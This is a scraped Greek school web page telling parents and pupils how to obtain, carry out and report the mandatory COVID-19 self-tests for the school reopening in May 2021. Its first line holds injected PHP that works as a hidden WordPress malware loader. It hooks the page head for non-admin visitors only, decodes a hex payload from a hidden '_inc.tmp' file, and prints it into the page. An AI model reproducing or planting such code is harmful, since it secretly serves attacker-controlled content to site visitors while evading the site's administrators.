if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ΟΔΗΓΙΕΣ ΓΙΑ ΓΟΝΕΙΣ-ΜΑΘΗΤΕΣ ΣΧΕΤΙΚΑ ΜΕ ΤΗ ΧΡΗΣΗ ΤΩΝ ΑΥΤΟΔΙΑΓΝΩΣΤΙΚΩΝ ΕΛΕΓΧΩΝ ΓΙΑ COVID-19 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

ΟΔΗΓΙΕΣ ΓΙΑ ΓΟΝΕΙΣ-ΜΑΘΗΤΕΣ ΣΧΕΤΙΚΑ ΜΕ ΤΗ ΧΡΗΣΗ ΤΩΝ ΑΥΤΟΔΙΑΓΝΩΣΤΙΚΩΝ ΕΛΕΓΧΩΝ ΓΙΑ COVID-19

Ενόψει της επανέναρξης λειτουργίας των σχολικών μονάδων τη Δευτέρα 10/5/2021 παραθέτουμε όλες τις σχετικές πληροφορίες-οδηγίες που αφορούν την υποχρεωτική χρήση δωρεάν αυτοδιαγνωστικών ελέγχων (self test) από τους μαθητές, για την αντιμετώπιση της διασποράς του κορωνοϊού covid-19.

Ο διαγνωστικός έλεγχος νόσησης από τον κορωνοϊό COVID-19 μέσω δωρεάν αυτοδιαγνωστικής δοκιμασίας ελέγχου είναι υποχρεωτικός για τους μαθητές τους εκπαιδευτικούς, τα μέλη του Ειδικού Εκπαιδευτικού Προσωπικού (Ε.Ε.Π.) και του Ειδικού Βοηθητικού Προσωπικού (Ε.Β.Π.), το διοικητικό και το λοιπό προσωπικό όλων των σχολικών μονάδων Πρωτοβάθμιας και Δευτεροβάθμιας Εκπαίδευσης. 

Ο υποχρεωτικός αυτοδιαγνωστικός έλεγχος νόσησης διενεργείται κάθε σχολική εβδομάδα, τουλάχιστον μία φορά, πριν από τη Δευτέρα. Ο έλεγχος διενεργείται έως και είκοσι τέσσερις (24) ώρες πριν από την προσέλευση στη σχολική μονάδα.

Για την πρώτη εβδομάδα της δια ζώσης λειτουργίας των σχολείων θα διενεργηθούν δύο (2) self test. Το ένα πριν από τη Δευτέρα 10/5 και το άλλο πριν από την Πέμπτη 13/5. Τα τεστ για τη Δευτέρα είναι ήδη διαθέσιμα από τις 5/5 στα φαρμακεία και μπορούν οι γονείς να τα προμηθευτούν άμεσα. Τα τεστ για την ερχόμενη Πέμπτη θα είναι διαθέσιμα από τη Δευτέρα 10/5. Για τις επόμενες εβδομάδες θα υπάρξει νέα ενημέρωση.

  • Διαδικασία προμήθειας και διενέργεια του αυτοδιαγνωστικού ελέγχου

Η προμήθεια του αυτοδιαγνωστικού ελέγχου γίνεται δωρεάν από το φαρμακείο.

Για τους ανήλικους μαθητές τον δωρεάν αυτοδιαγνωστικό έλεγχο παραλαμβάνουν οι γονείς/κηδεμόνες τους, επιδεικνύοντας 

  1. τον Α.Μ.Κ.Α., Π.Α.Μ.Κ.Α. ή Π.Α.Α.Υ.Π.Α. του ανηλίκου μαθητή και 
  2. την αστυνομική ταυτότητα ή οποιοδήποτε άλλο έγγραφο ταυτοποίησης των ιδίων (γονέων/κηδεμόνων).

Οι μαθητές, των οποίων ο ΑΜΚΑ δεν εμφανίζεται, ώστε να παραλάβουν τον αυτοδιαγνωστικό έλεγχο από το φαρμακείο, πρέπει να μεταβαίνουν για αυτοδιαγνωστικό έλεγχο, σε μια από τις δημόσιες δομές, όπως αυτές είναι αναρτημένες στην ηλεκτρονική πλατφόρμα self-testing.gov.gr.

Ο δωρεάν αυτοδιαγνωστικός έλεγχος διενεργείται κατ’ οίκον σύμφωνα με τις οδηγίες τωνενημερωτικών φυλλαδίων. Για τους ανήλικους μαθητές ηλικίας κάτω των δεκατριών (13) ετών ο δωρεάν αυτο-διαγνωστικός έλεγχος διενεργείται με τη βοήθεια του γονέα/κηδεμόνα. 

  • Πού και πώς δηλώνουμε το αποτέλεσμα του ελέγχου

Οι γονείς/κηδεμόνες των ανηλίκων μαθητών επισκέπτονται την ηλεκτρονική πλατφόρμα self-testing.gov.gr, και, αφού επιλέξουν την κατηγορία «Σχολική Κάρτα για COVID-19», στη συνέχεια κάνουν χρήση των κωδικών του taxisnet, και ακολουθούν τη διαδικασία υποβολής του αποτελέσματος. 

  1. Εάν το αποτέλεσμα του αυτοδιαγνωστικού ελέγχου είναι αρνητικό, εκδίδεται από την πλατφόρμα σχολική κάρτα αρνητικού αποτελέσματος, την οποία εκτυπώνουν οι γονείς. Ο μαθητής επιδεικνύει, χωρίς να παραδίδει, τη σχολική κάρτα εντός της τάξης, στον εκπαιδευτικό της πρώτης ώρας και τη φέρει μαζί του μέχρι τη διενέργεια του επόμενου διαγνωστικού ελέγχου σε περίπτωση που ζητηθεί επίδειξή της από εκπαιδευτικό ή από τον Διευθυντή. 
  2. Εάν το αποτέλεσμα του αυτοδιαγνωστικού ελέγχου είναι θετικό, εκδίδεται από την πλατφόρμα σχολική κάρτα θετικού αποτελέσματος, την οποία εκτυπώνουν οι γονείς. Σε αυτή την περίπτωση, τα ανωτέρω πρόσωπα μεταβαίνουν εντός είκοσι τεσσάρων (24) ωρών σε δημόσια δομή, όπως αυτές είναι αναρτημένες στην πλατφόρμα self-testing.gov.gr, για δωρεάν επαναληπτικό έλεγχο. Μέχρι να μεταβούν στη δημόσια δομή, οι διαγνωσθέντες θετικοί μαθητές και οι οικείοι τους, παραμένουν σε κατ’ οίκον περιορισμό ακολουθώντας τις σχετικές οδηγίες του Ε.Ο.Δ.Υ. Εάν το αποτέλεσμα του δωρεάν επαναληπτικού ελέγχου είναι θετικό, ακολουθείται το πρωτόκολλο του Ε.Ο.Δ.Υ. Εάν το αποτέλεσμα του δωρεάν επαναληπτικού ελέγχου είναι αρνητικό, τότε εκδίδεται σχετική βεβαίωση από τη δημόσια δομή, με την οποία βεβαιώνεται το αρνητικό αποτέλεσμα. Στην περίπτωση αυτή, ο μαθητής επιστρέφει στον χώρο της σχολικής μονάδας, επιδεικνύοντας την ως άνω βεβαίωση. 
  3. Αντί του δωρεάν επαναληπτικού ελέγχου οι γονείς/κηδεμόνες των ανηλίκων μαθητών δύνανται να επιλέξουν τη διεξαγωγή διαγνωστικού ελέγχου (rapid test ή PCR test) από επαγγελματία υγείας σε ιδιωτική δομή, η οποία γίνεται με επιβάρυνση του πολίτη. 
  • Αδυναμία εκτύπωσης της σχολικής κάρτας COVID-19

Σε περίπτωση αδυναμίας εκτύπωσης της σχολικής κάρτας COVID-19, αυτή μπορεί να συμπληρωθεί και να υπογραφεί και χειρόγραφα από τους γονείς/κηδεμόνες των ανηλίκων μαθητών. Στο τέλος του παρόντος άρθρου είναι διαθέσιμο για λήψη ή εκτύπωση το σχετικό έντυπο (ΣΧΟΛΙΚΗ ΚΑΡΤΑ Covid-19). Οι γονείς μπορούν να το εκτυπώσουν οποιαδήποτε στιγμή σε πολλά αντίτυπα ώστε να το χρησιμοποιούν όταν απαιτείται. Εναλλακτικά μπορούν να το προμηθευτούν από το σχολείο.

  • Εναλλακτική επιλογή αντί του αυτοδιαγνωστικού ελέγχου

Αντί του δωρεάν αυτοδιαγνωστικού ελέγχου (self test) οι μαθητές δύνανται να επιλέξουν τη διεξαγωγή διαγνωστικού ελέγχου (rapid test ή PCR test) από επαγγελματία υγείας είτε δωρεάν σε δημόσια δομή, στην οποία παρέχεται η σχετική δυνατότητα, είτε με επιβάρυνσή τους σε ιδιωτική δομή. 

Η διεξαγωγή των διαγνωστικών αυτών ελέγχων γίνεται κάθε σχολική εβδομάδα, τουλάχιστον άπαξ, εντός εβδομήντα δύο (72) ωρών πριν από τη Δευτέρα. Εάν ο διαγνωστικός έλεγχος (rapid test ή PCR test) είναι αρνητικός, τότε συντάσσεται χειρόγραφη βεβαίωση αρνητικού αποτελέσματος και υπογράφεται από τους γονείς/κηδεμόνες των ανηλίκων μαθητών.

Εάν ο διαγνωστικός έλεγχος (rapid test ή PCR test) είναι θετικός, ακολουθείται το Πρωτόκολλο του Ε.Ο.Δ.Υ. Εάν ο διαγνωστικός έλεγχος (rapid test ή PCR test) είναι αρνητικός, τότε ο μαθητής επιδεικνύει στον εκπαιδευτικό της πρώτης ώρας εντός της τάξης ή στον Διευθυντή τη σχετική βεβαίωση και τη φέρει μαζί του καθ’ όλη τη διάρκεια της σχολικής εβδομάδας. 

  • Μαθητές με αναπηρία ή ειδικές ανάγκες 

Για τους μαθητές με αναπηρία ή και ειδικές εκπαιδευτικές ανάγκες ο δωρεάν αυτοδιαγνωστικός έλεγχος δεν έχει υποχρεωτικό χαρακτήρα και συνιστάται να διενεργείται εφόσον είναι συμβατός με τον βαθμό και το είδος της αναπηρίας ή και της ειδικής εκπαιδευτικής ανάγκης του/της μαθητή/τριας

  • Μη επίδειξη σχολικής κάρτας από τους μαθητές 

Στην περίπτωση που μαθητής δεν επιδείξει την σχολική κάρτα κατά την είσοδό του στην τάξη, τότε δε γίνεται δεκτός, λαμβάνει απουσία και απομακρύνεται από τη σχολική μονάδα ή παραμένει στον ειδικό χώρο που έχει διαμορφωθεί ανά τις σχολικές μονάδες για την αποφυγή περαιτέρω μετάδοσης του κορωνοϊού COVID-19, μέχρις ότου οι γονείς/κηδεμόνες τον παραλάβουν τηρουμένων όλων των ισχυόντων μέτρων προστασίας.